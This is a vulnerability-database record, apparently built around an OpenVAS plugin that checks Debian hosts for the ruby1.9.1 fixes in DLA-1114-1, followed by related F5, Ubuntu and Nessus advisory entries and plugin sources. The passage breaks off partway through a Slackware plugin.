{"id": "OPENVAS:1361412562310891114", "type": "openvas", "bulletinFamily": "scanner", "title": "Debian LTS: Security Advisory for ruby1.9.1 (DLA-1114-1)", "description": "Multiple vulnerabilities were discovered in the Ruby 1.9 interpreter.\n\nCVE-2017-0898\n\nBuffer underrun vulnerability in Kernel.sprintf\n\nCVE-2017-0899\n\nANSI escape sequence vulnerability\n\nCVE-2017-0900\n\nDOS vulernerability in the query command\n\nCVE-2017-0901\n\ngem installer allows a malicious gem to overwrite arbitrary files\n\nCVE-2017-10784\n\nEscape sequence injection vulnerability in the Basic\nauthentication of WEBrick\n\nCVE-2017-14033\n\nBuffer underrun vulnerability in OpenSSL ASN1 decode\n\nCVE-2017-14064\n\nHeap exposure vulnerability in generating JSON", "published": "2018-02-07T00:00:00", "modified": "2020-01-29T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891114", "reporter": "Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net", "references": ["https://lists.debian.org/debian-lts-announce/2017/09/msg00029.html"], "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-0901"], "lastseen": "2020-01-29T20:07:49", "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "f5", "idList": ["F5:K01730454"]}, {"type": "ubuntu", "idList": ["USN-3553-1", "USN-3528-1", "USN-3439-1", "USN-3685-1"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-1114.NASL", "SL_20180228_RUBY_ON_SL7_X.NASL", "EULEROS_SA-2018-1067.NASL", "EULEROS_SA-2019-1407.NASL", "ALA_ALAS-2017-915.NASL", "UBUNTU_USN-3439-1.NASL", "SLACKWARE_SSA_2017-261-03.NASL", "ALA_ALAS-2017-906.NASL", "EULEROS_SA-2018-1066.NASL", "FREEBSD_PKG_95B013799D5211E7A25C471BAFC3262F.NASL"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1112-1:73A63", "DEBIAN:DLA-1113-1:5D775", "DEBIAN:DSA-3966-1:856A1", "DEBIAN:DSA-4031-1:AC0D9", "DEBIAN:DLA-1421-1:5BC60", "DEBIAN:DLA-1114-1:DA09C"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220191407", "OPENVAS:1361412562311220181066", "OPENVAS:1361412562310873953", "OPENVAS:1361412562310843791", "OPENVAS:1361412562311220181067", "OPENVAS:1361412562310704031", "OPENVAS:1361412562310873376", "OPENVAS:1361412562311220181248", "OPENVAS:1361412562310843684", "OPENVAS:1361412562310882847"]}, {"type": "slackware", "idList": ["SSA-2017-261-03"]}, {"type": "amazon", "idList": ["ALAS-2017-915", "ALAS-2017-906"]}, {"type": "cve", "idList": ["CVE-2017-14064", "CVE-2017-0899", "CVE-2017-0900", "CVE-2017-0901", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-0898"]}, {"type": "freebsd", "idList": ["95B01379-9D52-11E7-A25C-471BAFC3262F"]}, {"type": "redhat", "idList": ["RHSA-2017:3485", "RHSA-2018:0378", "RHSA-2018:0585", "RHSA-2018:0583"]}, {"type": "centos", "idList": ["CESA-2018:0378"]}, {"type": "oraclelinux", "idList": ["ELSA-2018-0378"]}, {"type": "gentoo", "idList": ["GLSA-201710-01", "GLSA-201710-18"]}, {"type": "fedora", "idList": ["FEDORA:EB90F61CDEB4", "FEDORA:2FE52602F595", "FEDORA:E680D6015E29", "FEDORA:16FA760E0F1F", "FEDORA:605EC60A618F"]}, {"type": "hackerone", "idList": ["H1:209949", "H1:243003", "H1:226335", "H1:212241", "H1:243156", "H1:223363"]}, {"type": "zdt", "idList": ["1337DAY-ID-28426"]}, {"type": "exploitdb", "idList": ["EDB-ID:42611"]}, {"type": "apple", "idList": ["APPLE:HT208937", "APPLE:HT209193"]}], "modified": "2020-01-29T20:07:49", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2020-01-29T20:07:49", "rev": 2}, "vulnersScore": 7.6}, "pluginID": "1361412562310891114", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891114\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2017-0898\", \"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\");\n script_name(\"Debian LTS: Security Advisory for ruby1.9.1 (DLA-1114-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-02-07 00:00:00 +0100 (Wed, 07 Feb 2018)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/09/msg00029.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"ruby1.9.1 on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n1.9.3.194-8.1+deb7u6.\n\nWe recommend that you upgrade your ruby1.9.1 packages.\");\n\n script_tag(name:\"summary\", value:\"Multiple vulnerabilities were discovered in the Ruby 1.9 interpreter.\n\nCVE-2017-0898\n\nBuffer underrun vulnerability in Kernel.sprintf\n\nCVE-2017-0899\n\nANSI escape sequence vulnerability\n\nCVE-2017-0900\n\nDOS vulernerability in the query command\n\nCVE-2017-0901\n\ngem installer allows a malicious gem to overwrite arbitrary files\n\nCVE-2017-10784\n\nEscape sequence injection vulnerability in the Basic\nauthentication of WEBrick\n\nCVE-2017-14033\n\nBuffer underrun vulnerability in OpenSSL ASN1 decode\n\nCVE-2017-14064\n\nHeap exposure vulnerability in generating JSON\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libruby1.9.1\", ver:\"1.9.3.194-8.1+deb7u6\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libruby1.9.1-dbg\", ver:\"1.9.3.194-8.1+deb7u6\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libtcltk-ruby1.9.1\", ver:\"1.9.3.194-8.1+deb7u6\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ri1.9.1\", ver:\"1.9.3.194-8.1+deb7u6\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby1.9.1\", ver:\"1.9.3.194-8.1+deb7u6\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby1.9.1-dev\", ver:\"1.9.3.194-8.1+deb7u6\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby1.9.1-examples\", ver:\"1.9.3.194-8.1+deb7u6\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby1.9.1-full\", ver:\"1.9.3.194-8.1+deb7u6\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby1.9.3\", ver:\"1.9.3.194-8.1+deb7u6\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "naslFamily": "Debian Local Security Checks"}

{"f5": [{"lastseen": "2019-02-07T22:23:33", "bulletinFamily": "software", "cvelist": ["CVE-2017-0900", "CVE-2017-0899", "CVE-2017-0902", "CVE-2017-0901"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP AAM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 | Not vulnerable | None \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 | Not vulnerable | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP APM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.2 | Not vulnerable | None \nBIG-IP Edge Gateway | None | 11.2.1 | Not vulnerable | None \nBIG-IP GTM | None | 11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP Link Controller | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 | Not vulnerable | None \nBIG-IP PSM | None | 11.4.1 | Not vulnerable | None \nBIG-IP WebAccelerator | None | 11.2.1 | Not vulnerable | None \nBIG-IP WebSafe | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | Not vulnerable | None \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | None | 3.1.1 | Not vulnerable | None \nBIG-IQ Cloud | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.3.0 \n4.6.0 | Not vulnerable | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None \nF5 iWorkflow | None | 2.0.0 - 2.3.0 | Not vulnerable | None \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None \nTraffix SDC | None | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | Not vulnerable | None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2017-09-28T00:22:00", "published": "2017-09-11T20:16:00", "id": "F5:K01730454", "href": "https://support.f5.com/csp/article/K01730454", "title": "Ruby vulnerabilities CVE-2017-0899, CVE-2017-0900, CVE-2017-0901, and CVE-2017-0902", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2020-07-02T11:35:30", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-0901"], "description": "It was discovered that Ruby incorrectly handled certain inputs. \nAn attacker could use this to cause a buffer overrun. \n(CVE-2017-0898)\n\nYusuke Endoh discovered that Ruby incorrectly handled certain files. \nAn attacker could use this to execute terminal escape sequences. \n(CVE-2017-0899)\n\nYusuke Endoh discovered that Ruby incorrectly handled certain inputs. \nAn attacker could use this to cause a denial of service. \n(CVE-2017-0900)\n\nIt was discovered that Ruby incorrectly handled certain files. \nAn attacker could use this to overwrite any file on the filesystem. \n(CVE-2017-0901)\n\nIt was discovered that Ruby incorrectly handled certain inputs. \nAn attacker could use this to execute arbitrary code. \n(CVE-2017-10784)\n\nIt was discovered that Ruby incorrectly handled certain inputs. \nAn attacker could use this to cause a denial of service. \n(CVE-2017-14033)\n\nIt was discovered that Ruby incorrectly handled certain files. \nAn attacker could use this to expose sensitive information. \n(CVE-2017-14064)", "edition": 5, "modified": "2017-10-05T00:00:00", "published": "2017-10-05T00:00:00", "id": "USN-3439-1", "href": "https://ubuntu.com/security/notices/USN-3439-1", "title": "Ruby vulnerabilities", "type": "ubuntu", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:37:31", "bulletinFamily": "unix", "cvelist": ["CVE-2017-10784", "CVE-2017-14033", "CVE-2017-17790", "CVE-2017-14064"], "description": "It was discovered that Ruby incorrectly handled certain terminal emulator \nescape sequences. An attacker could use this to execute arbitrary code via \na crafted user name. This issue only affected Ubuntu 16.04 LTS and Ubuntu 17.10. \n(CVE-2017-10784)\n\nIt was discovered that Ruby incorrectly handled certain strings. \nAn attacker could use this to cause a denial of service. This issue \nonly affected Ubuntu 16.04 LTS and Ubuntu 17.10. (CVE-2017-14033)\n\nIt was discovered that Ruby incorrectly handled some generating JSON. \nAn attacker could use this to possible expose sensitive information. \nThis issue only affected Ubuntu 16.04 LTS and Ubuntu 17.10. \n(CVE-2017-14064)\n\nIt was discovered that Ruby incorrectly handled certain inputs. \nAn attacker could use this to execute arbitrary code. \n(CVE-2017-17790)", "edition": 5, "modified": "2018-01-10T00:00:00", "published": "2018-01-10T00:00:00", "id": "USN-3528-1", "href": "https://ubuntu.com/security/notices/USN-3528-1", "title": "Ruby vulnerabilities", "type": "ubuntu", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:40:18", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-0903", "CVE-2017-17742", "CVE-2017-10784", "CVE-2017-0902", "CVE-2018-1000074", "CVE-2018-8777", "CVE-2017-14064", "CVE-2017-0901"], "description": "Some of these CVE were already addressed in previous \nUSN: 3439-1, 3553-1, 3528-1. Here we address for \nthe remain releases.\n\nIt was discovered that Ruby incorrectly handled certain inputs. \nAn attacker could use this to cause a buffer overrun. (CVE-2017-0898)\n\nIt was discovered that Ruby incorrectly handled certain files. \nAn attacker could use this to overwrite any file on the filesystem. \n(CVE-2017-0901)\n\nIt was discovered that Ruby was vulnerable to a DNS hijacking vulnerability. \nAn attacker could use this to possibly force the RubyGems client to download \nand install gems from a server that the attacker controls. (CVE-2017-0902)\n\nIt was discovered that Ruby incorrectly handled certain YAML files. \nAn attacker could use this to possibly execute arbitrary code. (CVE-2017-0903)\n\nIt was discovered that Ruby incorrectly handled certain files. \nAn attacker could use this to expose sensitive information. \n(CVE-2017-14064)\n\nIt was discovered that Ruby incorrectly handled certain inputs. \nAn attacker could use this to execute arbitrary code. (CVE-2017-10784)\n\nIt was discovered that Ruby incorrectly handled certain network requests. \nAn attacker could possibly use this to inject a crafted key into a HTTP \nresponse. (CVE-2017-17742)\n\nIt was discovered that Ruby incorrectly handled certain files. \nAn attacker could possibly use this to execute arbitrary code. \nThis update is only addressed to ruby2.0. (CVE-2018-1000074)\n\nIt was discovered that Ruby incorrectly handled certain network requests. \nAn attacker could possibly use this to cause a denial of service. \n(CVE-2018-8777)", "edition": 5, "modified": "2018-06-13T00:00:00", "published": "2018-06-13T00:00:00", "id": "USN-3685-1", "href": "https://ubuntu.com/security/notices/USN-3685-1", "title": "Ruby vulnerabilities", "type": "ubuntu", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:33:47", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0903", "CVE-2017-0902", "CVE-2017-0901"], "description": "It was discovered that Ruby failed to validate specification names. \nAn attacker could possibly use a maliciously crafted gem to potentially \noverwrite any file on the filesystem. (CVE-2017-0901)\n\nIt was discovered that Ruby was vulnerable to a DNS hijacking vulnerability. \nAn attacker could use this to possibly force the RubyGems client to download \nand install gems from a server that the attacker controls. (CVE-2017-0902)\n\nIt was discovered that Ruby incorrectly handled certain YAML files. An attacker could \nuse this to possibly execute arbitrary code. (CVE-2017-0903)", "edition": 5, "modified": "2018-01-31T00:00:00", "published": "2018-01-31T00:00:00", "id": "USN-3553-1", "href": "https://ubuntu.com/security/notices/USN-3553-1", "title": "Ruby vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-12T09:38:41", "description": "Multiple vulnerabilities were discovered in the Ruby 1.9 interpretor.\n\nCVE-2017-0898\n\nBuffer underrun vulnerability in Kernel.sprintf\n\nCVE-2017-0899\n\nANSI escape sequence vulnerability\n\nCVE-2017-0900\n\nDOS vulernerability in the query command\n\nCVE-2017-0901\n\ngem installer allows a malicious gem to overwrite arbitrary files\n\nCVE-2017-10784\n\nEscape sequence injection vulnerability in the Basic authentication of\nWEBrick\n\nCVE-2017-14033\n\nBuffer underrun vulnerability in OpenSSL ASN1 decode\n\nCVE-2017-14064\n\nHeap exposure vulnerability in generating JSON\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n1.9.3.194-8.1+deb7u6.\n\nWe recommend that you upgrade your ruby1.9.1 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 17, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-09-27T00:00:00", "title": "Debian DLA-1114-1 : ruby1.9.1 security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-0901"], "modified": "2017-09-27T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:ruby1.9.1-examples", "p-cpe:/a:debian:debian_linux:ruby1.9.1", "p-cpe:/a:debian:debian_linux:libtcltk-ruby1.9.1", "p-cpe:/a:debian:debian_linux:ruby1.9.1-full", "p-cpe:/a:debian:debian_linux:ruby1.9.3", "p-cpe:/a:debian:debian_linux:ruby1.9.1-dev", "p-cpe:/a:debian:debian_linux:ri1.9.1", "p-cpe:/a:debian:debian_linux:libruby1.9.1-dbg", "cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:libruby1.9.1"], "id": "DEBIAN_DLA-1114.NASL", "href": "https://www.tenable.com/plugins/nessus/103472", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1114-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103472);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-0898\", \"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\");\n\n script_name(english:\"Debian DLA-1114-1 : ruby1.9.1 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities were discovered in the Ruby 1.9 interpretor.\n\nCVE-2017-0898\n\nBuffer underrun vulnerability in Kernel.sprintf\n\nCVE-2017-0899\n\nANSI escape sequence vulnerability\n\nCVE-2017-0900\n\nDOS vulernerability in the query command\n\nCVE-2017-0901\n\ngem installer allows a malicious gem to overwrite arbitrary files\n\nCVE-2017-10784\n\nEscape sequence injection vulnerability in the Basic authentication of\nWEBrick\n\nCVE-2017-14033\n\nBuffer underrun vulnerability in OpenSSL ASN1 decode\n\nCVE-2017-14064\n\nHeap exposure vulnerability in generating JSON\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n1.9.3.194-8.1+deb7u6.\n\nWe recommend that you upgrade your ruby1.9.1 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/09/msg00029.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/ruby1.9.1\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libruby1.9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libruby1.9.1-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtcltk-ruby1.9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ri1.9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby1.9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby1.9.1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby1.9.1-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby1.9.1-full\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby1.9.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libruby1.9.1\", reference:\"1.9.3.194-8.1+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libruby1.9.1-dbg\", reference:\"1.9.3.194-8.1+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libtcltk-ruby1.9.1\", reference:\"1.9.3.194-8.1+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"ri1.9.1\", reference:\"1.9.3.194-8.1+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"ruby1.9.1\", reference:\"1.9.3.194-8.1+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"ruby1.9.1-dev\", reference:\"1.9.3.194-8.1+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"ruby1.9.1-examples\", reference:\"1.9.3.194-8.1+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"ruby1.9.1-full\", reference:\"1.9.3.194-8.1+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"ruby1.9.3\", reference:\"1.9.3.194-8.1+deb7u6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T09:11:04", "description": "New ruby packages are available for Slackware 14.2 and -current to\nfix security issues.", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-09-19T00:00:00", "title": "Slackware 14.2 / current : ruby (SSA:2017-261-03)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-0901"], "modified": "2017-09-19T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.2", "cpe:/o:slackware:slackware_linux", "p-cpe:/a:slackware:slackware_linux:ruby"], "id": "SLACKWARE_SSA_2017-261-03.NASL", "href": "https://www.tenable.com/plugins/nessus/103308", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2017-261-03. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103308);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-0898\", \"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-0902\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\");\n script_xref(name:\"SSA\", value:\"2017-261-03\");\n\n script_name(english:\"Slackware 14.2 / current : ruby (SSA:2017-261-03)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New ruby packages are available for Slackware 14.2 and -current to\nfix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.371069\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5c56759f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ruby package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/19\");\n 